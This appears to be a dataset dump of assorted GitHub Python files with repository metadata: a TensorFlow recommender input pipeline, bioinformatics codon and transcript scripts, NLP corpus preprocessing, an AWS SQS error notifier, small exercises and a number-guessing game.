inputs[self._label_fields[x]] = labels[x]\n return inputs\n\n def _build(self, mode, params):\n if type(self._input_path) != list:\n self._input_path = self._input_path.split(',')\n file_paths = []\n for x in self._input_path:\n file_paths.extend(tf.gfile.Glob(x))\n assert len(file_paths) > 0, 'match no files with %s' % self._input_path\n\n # try to figure out number of fields from one file\n with tf.gfile.GFile(file_paths[0], 'r') as fin:\n num_lines = 0\n for line_str in fin:\n line_tok = 
line_str.strip().split(self._rtp_separator)\n if self._num_cols != -1:\n assert self._num_cols == len(line_tok), \\\n 'num selected cols is %d, not equal to %d, current line is: %s, please check rtp_separator and data.' % \\\n (self._num_cols, len(line_tok), line_str)\n self._num_cols = len(line_tok)\n num_lines += 1\n if num_lines > 10:\n break\n logging.info('num selected cols = %d' % self._num_cols)\n\n record_defaults = [\n self.get_type_defaults(t, v)\n for x, t, v in zip(self._input_fields, self._input_field_types,\n self._input_field_defaults)\n if x in self._label_fields\n ]\n\n # the features are in one single column\n record_defaults.append(\n self._data_config.separator.join([\n str(self.get_type_defaults(t, v))\n for x, t, v in zip(self._input_fields, self._input_field_types,\n self._input_field_defaults)\n if x not in self._label_fields\n ]))\n\n num_parallel_calls = self._data_config.num_parallel_calls\n if mode == tf.estimator.ModeKeys.TRAIN:\n logging.info('train files[%d]: %s' %\n (len(file_paths), ','.join(file_paths)))\n dataset = tf.data.Dataset.from_tensor_slices(file_paths)\n\n if self._data_config.file_shard:\n dataset = self._safe_shard(dataset)\n\n if self._data_config.shuffle:\n # shuffle input files\n dataset = dataset.shuffle(len(file_paths))\n\n # too many readers read the same file will cause performance issues\n # as the same data will be read multiple times\n parallel_num = min(num_parallel_calls, len(file_paths))\n dataset = dataset.interleave(\n tf.data.TextLineDataset,\n cycle_length=parallel_num,\n num_parallel_calls=parallel_num)\n\n if not self._data_config.file_shard:\n dataset = self._safe_shard(dataset)\n\n if self._data_config.shuffle:\n dataset = dataset.shuffle(\n self._data_config.shuffle_buffer_size,\n seed=2020,\n reshuffle_each_iteration=True)\n dataset = dataset.repeat(self.num_epochs)\n else:\n logging.info('eval files[%d]: %s' %\n (len(file_paths), ','.join(file_paths)))\n dataset = tf.data.TextLineDataset(file_paths)\n dataset = dataset.repeat(1)\n\n dataset = dataset.batch(batch_size=self._data_config.batch_size)\n\n dataset = dataset.map(\n self._parse_csv,\n num_parallel_calls=self._data_config.num_parallel_calls)\n\n # preprocess is necessary to transform data\n # so that they could be feed into FeatureColumns\n dataset = dataset.map(\n map_func=self._preprocess,\n num_parallel_calls=self._data_config.num_parallel_calls)\n\n dataset = dataset.prefetch(buffer_size=self._prefetch_size)\n\n if mode != tf.estimator.ModeKeys.PREDICT:\n dataset = dataset.map(lambda x:\n (self._get_features(x), self._get_labels(x)))\n else:\n dataset = dataset.map(lambda x: (self._get_features(x)))\n return dataset\n","repo_name":"alibaba/EasyRec","sub_path":"easy_rec/python/input/rtp_input.py","file_name":"rtp_input.py","file_ext":"py","file_size_in_byte":8528,"program_lang":"python","lang":"en","doc_type":"code","stars":1284,"dataset":"github-code","pt":"61"} +{"seq_id":"41876654664","text":"from Bio import SeqIO\r\nrecord = SeqIO.read(\"data/bacterial4.fasta\", \"fasta\")\r\n\r\n#randa start ir stop kodonu indexus ir kodonu daznius\r\ndef readSequence(frame, seq, dictCodons, totalCodons):\r\n starts= []\r\n stops = []\r\n for i in range(frame, len(seq), 3):\r\n totalCodons += 1\r\n codon = record.seq[i:i+3]\r\n if codon == \"ATG\": #start kodonu indexai\r\n starts.append(i)\r\n if codon == \"TAG\" or codon == \"TAA\" or codon == \"TGA\": #stop kodonu indexai\r\n stops.append(i)\r\n if (len(codon)==3):\r\n if codon in dictCodons:\r\n dictCodons[codon] += 
1\r\n            else:\r\n                dictCodons[codon] = 1\r\n    return starts, stops, dictCodons, totalCodons\r\n\r\ndef readSequenceDicodons(frame, seq, dictDicodons, totalDicodons):\r\n    for i in range(frame, len(seq), 6):\r\n        totalDicodons += 1\r\n        dicodon = record.seq[i:i+6]\r\n        if (len(dicodon)==6):\r\n            if dicodon in dictDicodons:\r\n                dictDicodons[dicodon] += 1\r\n            else:\r\n                dictDicodons[dicodon] = 1\r\n    return dictDicodons, totalDicodons\r\n\r\n#1. In the given sequence, find all start and stop codon pairs with no stop codon between them\r\ndef findPairs(starts, stops):\r\n    startStopPairs = []\r\n    pairFound = False\r\n    lastStopIndex = -1\r\n    for startIndex in starts:\r\n        pairFound = False\r\n        for stopIndex in stops:\r\n            if (startIndex<stopIndex and startIndex>lastStopIndex and stopIndex>lastStopIndex #2. For each stop codon, pick the start codon that is farthest from it\r\n                and stopIndex-startIndex>100): #3. Filter out all fragments (\"these would be the protein-coding sequences\") that are shorter than 100 symbols.\r\n                startStopPairs.append((startIndex,stopIndex))\r\n                lastStopIndex = stopIndex\r\n                pairFound = True\r\n    return startStopPairs\r\n\r\n#5. Write functions that evaluate codon and dicodon frequencies\r\ndef findFrequency(dictCodons, totalCodons, dictDicodons, totalDicodons):\r\n    for codon in dictCodons:\r\n        dictCodons[codon] = dictCodons[codon] / totalCodons\r\n    for dicodon in dictDicodons:\r\n        dictDicodons[dicodon] = dictDicodons[dicodon] / totalDicodons\r\n    return dictCodons, dictDicodons\r\n\r\ntotalCodons = 0\r\ntotalDicodons = 0\r\ndictCodons = {}\r\ndictDicodons = {}\r\n# 6 reading frames\r\nstarts1, stops1, dictCodons, totalCodons = readSequence(0,record.seq, dictCodons, totalCodons)\r\nstartStopPairs1 = findPairs(starts1, stops1)\r\ndictDicodons, totalDicodons = readSequenceDicodons(0, record.seq, dictDicodons, totalDicodons)\r\n\r\nstarts2, stops2, dictCodons, totalCodons = readSequence(1,record.seq, dictCodons, totalCodons)\r\nstartStopPairs2 = findPairs(starts2, stops2)\r\ndictDicodons, totalDicodons = readSequenceDicodons(1, record.seq, dictDicodons, totalDicodons)\r\n\r\nstarts3, stops3, dictCodons, totalCodons = readSequence(2,record.seq, dictCodons, totalCodons)\r\nstartStopPairs3 = findPairs(starts3, stops3)\r\ndictDicodons, totalDicodons = readSequenceDicodons(2, record.seq, dictDicodons, totalDicodons)\r\n\r\nstarts4, stops4, dictCodons, totalCodons = readSequence(0,record.seq.reverse_complement(), dictCodons, totalCodons)\r\nstartStopPairs4 = findPairs(starts4, stops4)\r\ndictDicodons, totalDicodons = readSequenceDicodons(0, record.seq.reverse_complement(), dictDicodons, totalDicodons)\r\n\r\nstarts5, stops5, dictCodons, totalCodons = readSequence(1,record.seq.reverse_complement(), dictCodons, totalCodons)\r\nstartStopPairs5 = findPairs(starts5, stops5)\r\ndictDicodons, totalDicodons = readSequenceDicodons(1, record.seq.reverse_complement(), dictDicodons, totalDicodons)\r\n\r\nstarts6, stops6, dictCodons, totalCodons = readSequence(2,record.seq.reverse_complement(), dictCodons, totalCodons)\r\nstartStopPairs6 = findPairs(starts6, stops6)\r\ndictDicodons, totalDicodons = readSequenceDicodons(2, record.seq.reverse_complement(), dictDicodons, totalDicodons)\r\n\r\ndictCodons, dictDicodons = findFrequency(dictCodons, totalCodons, dictDicodons, totalDicodons)\r\n\r\n# print frequencies to file (through terminal)\r\n# for codon in dictCodons:\r\n#     print(codon, dictCodons[codon])\r\nfor dicodon in dictDicodons:\r\n    print(dicodon, dictDicodons[dicodon])\r\n\r\n# (258, 780)\r\n# (300, 780) skip\r\n# 
(609, 780) skip\r\n# (612, 780) skip\r\n# (783, 2403)\r\n","repo_name":"sk057/BIOIT1","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22381285793","text":"from collections import namedtuple\n\nimport numpy as np\nfrom sklearn import preprocessing\n\nInputTargetSequence = namedtuple('InputTargetSequence', 'input output')\n\n\nclass TextData:\n def __init__(self, filename):\n self.char_seq = list(self.load_text(filename))\n self.label_encoder = preprocessing.LabelBinarizer()\n self.enc_text = self.label_encoder.fit_transform(\n self.char_seq)\n self.tot_chars, self.num_classes = self.enc_text.shape\n\n def encode(self, *vals):\n if len(vals) == 1:\n return np.squeeze(self.label_encoder.transform(list(vals[0])))\n else:\n return [self.encode(s) for s in vals]\n\n def decode_to_strings(self, *seqs):\n if len(seqs) == 1:\n return ''.join(self.label_encoder.inverse_transform(seqs[0]))\n else:\n return [self.decode_to_strings(s) for s in seqs]\n\n def get_seqs(self, length=25):\n for i in range(0, self.tot_chars - length, length):\n yield InputTargetSequence(\n input=self.enc_text[i:i + length],\n output=self.enc_text[i + 1:i + length + 1]\n )\n\n @staticmethod\n def load_text(filename):\n with open(filename, 'r') as f:\n return f.read()\n","repo_name":"GustavHenning/DeepLearning18","sub_path":"lab4/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4925641761","text":"import boto3\n\ndef main():\n sqs_client = boto3.client('sqs', region_name='us-east-1')\n error_response = sqs_client.send_message(\n QueueUrl='https://sqs.us-east-1.amazonaws.com/637137674144/rf_ec2_errors',\n MessageBody='AIR/GROUND: air_or_ground.py returned a value other than \"air\" or \"ground\"')\n\nif __name__ == '__main__':\n main()\n","repo_name":"richiefoster/image_processing_app","sub_path":"air_or_ground_error.py","file_name":"air_or_ground_error.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10180454479","text":"# --------------------approach 1----------------------------------------\n'''\ninput array : arr1 = [1, 2, 3, 4,5, 6,7,8,9]\noutput pattern : [9,1,8,2,7,3,6,4,5]\n'''\n\narr = [1,2,3,4,5]\n\nmin_list = []\nmax_list = []\nmax_value = 0\nmin_value = 0\nmin_temp = []\nsum_max_list = 0\nsum_min_list = 0\n\nif len(arr) <= 5:\n for index, value in enumerate(arr):\n if value > max_value:\n max_value = value\n for index, value in enumerate(arr):\n if value < arr[index-1]:\n min_value = value\n\n for ele in arr:\n if ele< max_value:\n min_list.append(ele)\n\n for ele in arr:\n if ele>min_value:\n max_list.append(ele)\n\n for ele in min_list:\n sum_min_list = sum_min_list+ele\n\n for ele in max_list:\n sum_max_list = sum_max_list+ele\n\n print(str(sum_min_list)+\" \"+str(sum_max_list))\n\n\nprint('max value : ', max_value)\nprint('min value : ', min_value)\nprint('max value list : ', max_list)\nprint('min value list : ', min_list)\n\n'''\n# --------------------------------approach 2 ------------------------------------#\narr = [4,3,-5,-5,9]\nmax_value = 0\nmin_value = 0\nlist_of_sum_of_four_elements = []\ntemp1, temp2, temp3, temp4, temp5 = 0, 0, 0, 0, 0\nif len(arr) <= 5:\n for index, value in enumerate(arr):\n print(index, value)\n if 
index in [1,2,3,4] :\n temp1 = temp1+value\n\n if index in [0,2,3,4]:\n temp2 = temp2+value\n\n if index in [0,1,3,4]:\n temp3 = temp3+value\n\n if index in [0,1,2,4]:\n temp4 = temp4+value\n\n if index in [0,1,2,3]:\n temp5 = temp5+value\n\n\nlist_of_sum_of_four_elements.append(temp1)\nlist_of_sum_of_four_elements.append(temp2)\nlist_of_sum_of_four_elements.append(temp3)\nlist_of_sum_of_four_elements.append(temp4)\nlist_of_sum_of_four_elements.append(temp5)\nprint(list_of_sum_of_four_elements)\n\n# for index, value in enumerate(list_of_sum_of_four_elements):\n# if value > max_value:\n# max_value = value\n# for index, value in enumerate(list_of_sum_of_four_elements):\n# if value < list_of_sum_of_four_elements[-index]:\n# min_value = value\n\nprint(max(list_of_sum_of_four_elements), min(list_of_sum_of_four_elements))\n\n'''","repo_name":"amits0003/Selenium_Study_Files","sub_path":"problem_solving_section/find_minimum_maximum_by_adding_exactly_four_out_of_five_integers_in_array.py","file_name":"find_minimum_maximum_by_adding_exactly_four_out_of_five_integers_in_array.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37051133481","text":"import os\r\nimport re\r\nimport time\r\nimport gzip\r\nimport codecs\r\nimport _pickle as pickle\r\nfrom functools import reduce\r\n\r\nimport numpy as np\r\n\r\nfrom keras.preprocessing.sequence import pad_sequences \r\nfrom keras.utils.np_utils import to_categorical\r\n\r\ndef _to_categorical(num,max_num):\r\n\tarr = np.zeros((1,max_num),dtype=np.int8)\r\n\tarr[0][num] = 1\r\n\treturn arr[0]\r\n\t\r\ndef index2onehot(max_num):\r\n\tonehot = []\r\n\tfor num in range(max_num):\r\n\t\tarr = np.zeros(max_num,dtype=np.int8)\r\n\t\tarr[num] = 1\r\n\t\tonehot.append(arr)\r\n\treturn onehot\r\n\t\r\ndef index2categorical(labels,max_num):\r\n\tlabels = list(np.array(labels).flatten())\r\n\tnum_labels = len(labels)\r\n\tcategorical = []\r\n\tfor num in range(max_num):\r\n\t\tarr = np.zeros((1,max_num),dtype=np.float16) #np.int8\r\n\t\tarr[0][num] = labels.count(num)/num_labels #prior probability for each label \r\n\t\tif np.float16(arr[0][num]) < np.float16(1e-7):\r\n\t\t\tarr[0][num] = np.float16(1e-7)\r\n\t\t# uniform distribution?\r\n\t\tcategorical.append(arr[0])\r\n\treturn categorical\r\n\r\nclass Corpus(object):\r\n\t'''\r\n\tBuild train/dev/test data easily and quickly!\r\n\t'''\r\n\tdef __init__(self,path,word2vec_path=None,label_pattern='__label__[\\-\\w]+'):\r\n\t\tself.path = os.path.abspath(path)\r\n\t\tself.filename = os.path.basename(self.path).split('.')[0] \r\n\t\tself.label_pattern = label_pattern\r\n\t\tself.size = round(os.path.getsize(path)/(1024*1024*1024),2)\r\n\t\tself.texts = []\r\n\t\tself.max_text_length = 0\r\n\t\tself.labels = []\r\n\t\tself.word_index = {'__PADDING__':0}\r\n\t\tself.label_index = {}\r\n\t\tself.word2vec_path = word2vec_path\r\n\t\tself.multi_label = False\r\n\t\t\r\n\tdef preprocess(self):\r\n\t\tstart = time.time()\r\n\t\twith codecs.open(self.path,'r',encoding='utf-8') as f:\r\n\t\t\tfor line in f.readlines():\r\n\t\t\t\tline = line.strip()\r\n\t\t\t\tre_labels = re.findall(self.label_pattern,line)\r\n\t\t\t\ttext = re.sub(self.label_pattern,'',line)\r\n\t\t\t\t# if each line with multilabels\r\n\t\t\t\tif re_labels != None and len(re_labels) > 0:# for multilabel\r\n\t\t\t\t\tword_ids = []\r\n\t\t\t\t\tfor word in text.split(' '):#text preprocess\r\n\t\t\t\t\t\tif word not in 
self.word_index:\r\n\t\t\t\t\t\t\tword_id = len(self.word_index)\r\n\t\t\t\t\t\t\tself.word_index[word] = word_id\r\n\t\t\t\t\t\t\tword_ids.append(word_id)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tword_ids.append(self.word_index[word])\r\n\t\t\t\t\tword_ids_length = len(word_ids)\r\n\t\t\t\t\tif word_ids_length > self.max_text_length:\r\n\t\t\t\t\t\tself.max_text_length = word_ids_length\r\n\t\t\t\t\tself.texts.append(word_ids)\r\n\t\t\t\t\tlabel_ids = []\r\n\t\t\t\t\tif len(re_labels) > 1 and self.multi_label == False:\r\n\t\t\t\t\t\tself.multi_label = True\r\n\t\t\t\t\tfor label in re_labels:\r\n\t\t\t\t\t\tif label not in self.label_index:\r\n\t\t\t\t\t\t\tlabel_id = len(self.label_index)\r\n\t\t\t\t\t\t\tself.label_index[label] = label_id\r\n\t\t\t\t\t\t\tlabel_ids.append(label_id)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tlabel_ids.append(self.label_index[label])\r\n\t\t\t\t\tself.labels.append(label_ids)\r\n\t\tself.num_words = len(self.word_index)\r\n\t\tself.texts = np.array(pad_sequences(self.texts,\r\n\t\t\t\t\t\t\t\t maxlen=self.max_text_length,\r\n\t\t\t\t\t\t\t\t padding='post',\r\n\t\t\t\t\t\t\t\t truncating='post',\r\n\t\t\t\t\t\t\t\t value=0),dtype=np.int32)\r\n\t\tself.num_texts = len(self.texts)\r\n\t\tself.num_classes = len(self.label_index)\r\n\t\tif self.multi_label == True:\t\t#multi_label\r\n\t\t\t\tcategorical = index2categorical(self.labels,self.num_classes)\r\n\t\t\t\tfor index,label_ids in enumerate(self.labels):\r\n\t\t\t\t\tarr = sum([categorical[label_id] for label_id in label_ids])\r\n\t\t\t\t\tself.labels[index] = arr/arr.sum() #normalized\r\n\t\t\t\tself.labels = np.array(self.labels)\r\n\t\telse:\r\n\t\t\tonehot = index2onehot(self.num_classes)\r\n\t\t\tself.labels = np.array([onehot[label_ids[0]] for label_ids in self.labels])\r\n\t\t\t#self.labels = np.array([_to_categorical(label_ids[0],self.num_classes) for label_ids in self.labels])\r\n\t\tself.num_labels = len(self.labels)\r\n\t\tassert self.num_texts == self.num_labels\r\n\t\t# preprocess pretrained word2vec\r\n\t\tif not self.word2vec_path == None: \r\n\t\t\tself.embeddings_index = {}\r\n\t\t\tvectors = 0\r\n\t\t\twith codecs.open(self.word2vec_path,'r',encoding='utf-8') as f:\r\n\t\t\t\tf.readline()\r\n\t\t\t\twhile True:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tline = f.readline()\r\n\t\t\t\t\t\tvalues = line.split()\r\n\t\t\t\t\t\tword = values[0]\r\n\t\t\t\t\t\tvectors = np.asarray(values[1:], dtype='float16')#float32\r\n\t\t\t\t\t\tself.embeddings_index[word] = vectors\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tf.close()\r\n\t\t\tself.vector_dim = len(vectors)\r\n\t\t\tself.embedding_matrix = np.zeros((self.num_words + 1,self.vector_dim))\r\n\t\t\tfor word, index in self.word_index.items(): \r\n\t\t\t\tif word in self.embeddings_index: \r\n\t\t\t\t\tself.embedding_matrix[index] = self.embeddings_index[word]\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.embedding_matrix[index] = np.random.uniform(-1,1,size=(self.vector_dim)) #unlogin word \r\n\t\t\tself.num_embeddings = len(self.embeddings_index)\r\n\t\t\tself.embedding_matrix_shape =self.embedding_matrix.shape\r\n\t\telse:\r\n\t\t\tself.embedding_matrix = None\r\n\t\tself.preprocess_time = round(time.time() - start,2)\r\n\t\t\r\n\tdef summary(self):\r\n\t\tprint('path:'.ljust(18),self.path,\r\n\t\t\t '\\nfilename:'.ljust(18),self.filename,\r\n\t\t\t '\\nlabel_pattern:'.ljust(18),self.label_pattern,\r\n\t\t\t '\\nsize:'.ljust(18),'%sGB'%self.size,\r\n\t\t\t '\\nnum_texts:'.ljust(18),self.num_texts,\r\n\t\t\t 
'\\ntexts_shape:'.ljust(18),self.texts.shape,\r\n\t\t\t '\\nnum_labels:'.ljust(18),self.num_labels,\r\n\t\t\t '\\nlabels_shape:'.ljust(18),self.labels.shape,\r\n\t\t\t '\\nnum_words:'.ljust(18),self.num_words,\r\n\t\t\t '\\nnum_classes:'.ljust(18),self.num_classes,\r\n\t\t\t '\\nmulti_label:'.ljust(18),self.multi_label,\r\n\t\t\t '\\nmax_text_length:'.ljust(18),self.max_text_length,\r\n\t\t\t '\\npreprocess_time:'.ljust(18),'%ss'%self.preprocess_time\r\n\t\t\t )\r\n\t\tif not self.word2vec_path == None:\r\n\t\t\tprint('num_embeddings:'.ljust(18),self.num_embeddings,\r\n\t\t\t\t '\\nvector_dim:'.ljust(18),self.vector_dim,\r\n\t\t\t\t '\\nmatrix_shape:'.ljust(18),self.embedding_matrix_shape\r\n\t\t\t )\r\n\t\t\t \r\n\t@staticmethod\r\n\tdef dump(corpus):\r\n\t\tcorpus_object_path = os.path.join(os.path.dirname(corpus.path),\r\n\t\t\t\t\t\t\tcorpus.filename+'.'+corpus.__class__.__name__+'.pkl.gz')\r\n\t\twith gzip.open(corpus_object_path,'wb') as f:\r\n\t\t\tpickle.dump(corpus,f)\r\n\t\t\tprint(corpus_object_path,\r\n\t\t\t\t': %sGB'%round(os.path.getsize(corpus_object_path)/(1024*1024*1024),2))\r\n\t\t\t\t \r\n\t@staticmethod\r\n\tdef load(corpus_path):\r\n\t\tcorpus_path = os.path.abspath(corpus_path)\r\n\t\twith gzip.open(corpus_path,'rb') as f:\r\n\t\t\treturn pickle.load(f)\r\n\t\t\t\r\n\t@staticmethod\r\n\tdef test2corpus(corpus,test_path):\r\n\t\ttest = []\r\n\t\ttest_path = os.path.abspath(test_path)\r\n\t\twith codecs.open(test_path,'r',encoding='utf-8') as f:\r\n\t\t\tfor line in f.readlines():\r\n\t\t\t\tline = line.strip()\r\n\t\t\t\tword_ids = []\r\n\t\t\t\tfor word in line.split(' '):#text preprocess\r\n\t\t\t\t\tif word not in corpus.word_index:\r\n\t\t\t\t\t\tword_ids.append(0) #unlogin term 0\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tword_ids.append(corpus.word_index[word])\r\n\t\t\t\t# word_ids_length = len(word_ids)\r\n\t\t\t\t# if word_ids_length > corpus.max_text_length: # over length\r\n\t\t\t\t\t# word_ids = word_ids[:corpus.max_text_length]\r\n\t\t\t\ttest.append(word_ids)\r\n\t\ttest = np.array(pad_sequences(test,\r\n\t\t\t\t\t\t maxlen=corpus.max_text_length,\r\n\t\t\t\t\t\t padding='post',\r\n\t\t\t\t\t\t truncating='post',\r\n\t\t\t\t\t\t value=0),dtype=np.int32)\r\n\t\treturn test\r\n\t\t\r\n\t@staticmethod\r\n\tdef to_label(top,label_index):\r\n\t\tindex_label = dict(zip(label_index.values(),label_index.keys()))\r\n\t\tlabel = []\r\n\t\tfor label_ids in top:\r\n\t\t\tlabels = []\r\n\t\t\tfor label_id in label_ids:\r\n\t\t\t\tlabels.append(index_label[label_id])\r\n\t\t\tlabel.append(labels)\r\n\t\treturn label\r\n\t\r\n\t@classmethod\r\n\tdef transform(cls,corpus):\r\n\t\tcorpus.preprocess()\r\n\t\tcorpus.summary()\r\n\t\t#cls.dump(corpus)\r\n\t\t\r\ndef main():\r\n\tpass","repo_name":"lyfree132/text2class","sub_path":"corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12032853169","text":"import random\r\n\r\n\r\ndef high_low():\r\n count = 0\r\n a = random.randint(1, 9)\r\n user = int(input(\"Please enter a number from one to nine: \"))\r\n while True :\r\n#definitely can simplify the user input condition\r\n if user > a and user >= 1 and user <=9:\r\n print(\"Lower\")\r\n user = int(input(\"Please enter a different number: \"))\r\n count += 1\r\n elif user < a and user >= 1 and user <=9: \r\n print(\"Higher\")\r\n user = int(input(\"Please enter a different number: \"))\r\n count += 1\r\n elif user == a:\r\n print(\"You've won, you 
took\", count, \"try/tries to win!\")\r\n ans = input(\"Would you like to play again? Y/N\")\r\n if ans == \"y\":\r\n high_low()\r\n else:\r\n print(\"Thank you for playing!\")\r\n break\r\n# there seems to be a problem when you try to stop after playing multiple times\r\n else:\r\n user = int(input(\"Please enter a valid answer:\"))\r\n\r\n \r\nhigh_low()","repo_name":"tientea/Fun-exercises","sub_path":"highlow.py","file_name":"highlow.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43041919628","text":"#!/usr/bin/env python3\n\n\"\"\"\nAuthor:\n Kristján Eldjárn Hjörleifsson\n keldjarn@caltech.edu\n\nUsage:\n./extract_introns.py --gtf annotation.gtf3 --fa scaffolds.fasta -out output_directory [--union] [--diff]\n\n\"\"\"\n\nfrom operator import itemgetter\nfrom itertools import chain\nimport argparse\nimport gzip\n\nfrom utils import (reverse_complement, parse_rest, parse_fasta, collapse_N,\n merge_intervals, interval_diff)\n\ndef write_gene(gene, data, out):\n if len(data) == 0:\n return\n with open(path, 'a') as fh:\n fh.write(f'>{tr}\\n')\n fh.write(data)\n # fh.write('\\n'.join([data[i:i+80] for i in range(0, len(data), 80)]))\n fh.write('\\n')\n\ndef collapse_data(intervals, sequence, strand):\n data = ''.join(map(lambda iv: sequence[iv[0]:iv[1]], intervals))\n data = collapse_N(data.upper())\n if strand == '-':\n data = reverse_complement(data)\n return data\n\ndef process_gene(gene, scaffolds, out, nascent, mature):\n try:\n sequence = scaffolds[gene['scaffold']]\n except KeyError as _:\n print(f'Scaffold {gene[\"scaffold\"]} not found.')\n return\n\n print(f'processing {gene[\"name\"]}')\n\n if not nascent and not mature:\n nascent = True\n mature = True\n\n if nascent:\n # Find start of first exon and end of last exon in gene\n end = 0\n start = float('inf')\n for tr, data in gene['trs'].items():\n start = min(start, min(e['start'] for e in data['exons']))\n end = max(end, max(e['end'] for e in data['exons']))\n seq = sequence[start:end]\n header = f'>{gene[\"name\"]} nascent_transcript chromosome:GRCh38:{gene[\"scaffold\"]}:{gene[\"start\"]}:{gene[\"end\"]} gene:{gene[\"name\"]} strand{gene[\"strand\"]}\\n'\n out.write(header)\n # out.write('\\n'.join([seq[i:i+80] for i in range(0, len(seq), 80)]))\n out.write(seq)\n out.write('\\n')\n\n for tr, data in gene['trs'].items():\n exons = data['exons']\n # TODO:\n # Decide how to handle single-exon isoforms\n\n # Nascent transcript\n # seq = sequence[gene['start']:gene['end']]\n # # if gene['strand'] == '-':\n # # seq = reverse_complement(seq)\n\n # if nascent:\n # header = f'>{tr}.N nascent_transcript chromosome:GRCh38:{gene[\"scaffold\"]}:{gene[\"start\"]}:{gene[\"end\"]} gene:{gene[\"name\"]} strand{gene[\"strand\"]}\\n'\n # out.write(header)\n # # out.write('\\n'.join([seq[i:i+80] for i in range(0, len(seq), 80)]))\n # out.write(seq)\n # out.write('\\n')\n\n # Mature transcript\n if mature:\n ivs = sorted([(e['start'], e['end']) for e in exons], key=lambda e: e[0])\n ivs = list(merge_intervals(ivs))\n header = f'>{tr} mature_transcript chromosome:GRCh38:{gene[\"scaffold\"]}:{ivs[0][0]}:{ivs[-1][1]} gene:{gene[\"name\"]} strand{gene[\"strand\"]}\\n'\n seq = collapse_data(ivs, sequence, '+')\n out.write(header)\n out.write('\\n'.join([seq[i:i+80] for i in range(0, len(seq), 80)]))\n out.write('\\n')\n\ndef parse_gtf(path, scaffolds, out, nascent, mature):\n # Who the heck came up with this hecking file format?\n genes = {}\n 
# Apparently, gtf files are not necessarily ordered by gene, so we cannot\n # do this in a single pass-through\n with gzip.open(path, 'r') as fh:\n for l in fh:\n\n line = l.decode('utf-8')\n # Skip comments\n if line.startswith('#'):\n continue\n\n data = line.split('\\t')\n fields = {\n 'scaffold': data[0],\n 'feature': data[2],\n 'start': int(data[3]) - 1, # Scaffold is 0-indexed\n 'end': int(data[4]) - 1,\n 'strand': data[6],\n 'rest': parse_rest(data[8])\n }\n gene_id = fields['rest']['gene_id']\n\n if gene_id not in genes:\n genes[gene_id] = {\n 'name': gene_id,\n 'trs': {},\n 'scaffold': fields['scaffold'],\n 'strand': fields['strand']\n }\n\n if fields['feature'] in ['exon',\n 'UTR',\n 'start_codon',\n 'stop_codon',\n 'five_prime_utr',\n 'three_prime_utr',\n 'CDS']:\n tr = fields['rest']['transcript_id']\n if tr not in genes[gene_id]['trs']:\n genes[gene_id]['trs'][tr] = {\n 'name': tr,\n 'exons': [fields]\n }\n else:\n genes[gene_id]['trs'][tr]['exons'].append(fields)\n elif fields['feature'] == 'gene':\n genes[gene_id]['start'] = fields['start']\n genes[gene_id]['end'] = fields['end']\n\n fh = open(out, 'w')\n for _, gene in genes.items():\n process_gene(gene, scaffolds, fh, nascent, mature)\n fh.close()\n\ndef generate_cDNA_introns(gtf_path, fasta_path, out='.', nascent=False, mature=False):\n scaffolds = parse_fasta(fasta_path)\n parse_gtf(gtf_path, scaffolds, out, nascent, mature)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--nascent', action='store_true')\n parser.add_argument('--mature', action='store_true')\n parser.add_argument('--gtf', type=str, help='Path to GTF file')\n parser.add_argument('--fa', type=str, help='Path to fasta file')\n parser.add_argument('--out', type=str, help='Path to output file')\n args = parser.parse_args()\n\n generate_cDNA_introns(args.gtf, args.fa, args.out, args.nascent, args.mature)\n","repo_name":"pachterlab/HSHMP_2022","sub_path":"extract_introns/generate_cDNA+introns.py","file_name":"generate_cDNA+introns.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"45912738610","text":"import re\nfile_name = 'input.txt'\ninput = open(file_name, 'r').readline().rstrip('\\n').lstrip('target area: ')\nta_x_min,ta_x_max,ta_y_min,ta_y_max = [int(val) for val in re.findall(r\"-*\\d+\",input)] \n \ndef move(x_pos,y_pos,x_vel,y_vel):\n x_pos += x_vel\n y_pos += y_vel\n if x_vel > 0:\n x_vel -= 1\n elif x_vel < 0:\n x_vel += 1\n y_vel -= 1\n return x_pos,y_pos,x_vel,y_vel\n \ndef is_target_reached(x_pos,y_pos):\n return x_pos >= ta_x_min and x_pos <= ta_x_max and y_pos >= ta_y_min and y_pos <= ta_y_max\n\ndef is_targed_missed(x_pos,y_pos):\n return x_pos > ta_x_max or y_pos < ta_y_min\n \ndef main():\n max_y_reached = 0\n for x_start_vel in range(1,1000):\n for y_start_vel in range(1,1000):\n x_pos = 0\n y_pos = 0\n x_vel = x_start_vel\n y_vel = y_start_vel\n local_max_y = 0\n while not is_targed_missed(x_pos,y_pos):\n if y_pos > local_max_y:\n local_max_y = y_pos\n if is_target_reached(x_pos,y_pos):\n if local_max_y > max_y_reached:\n max_y_reached = local_max_y\n break\n x_pos,y_pos,x_vel,y_vel = move(x_pos,y_pos,x_vel,y_vel)\n return max_y_reached\n\n\nif __name__ == \"__main__\":\n 
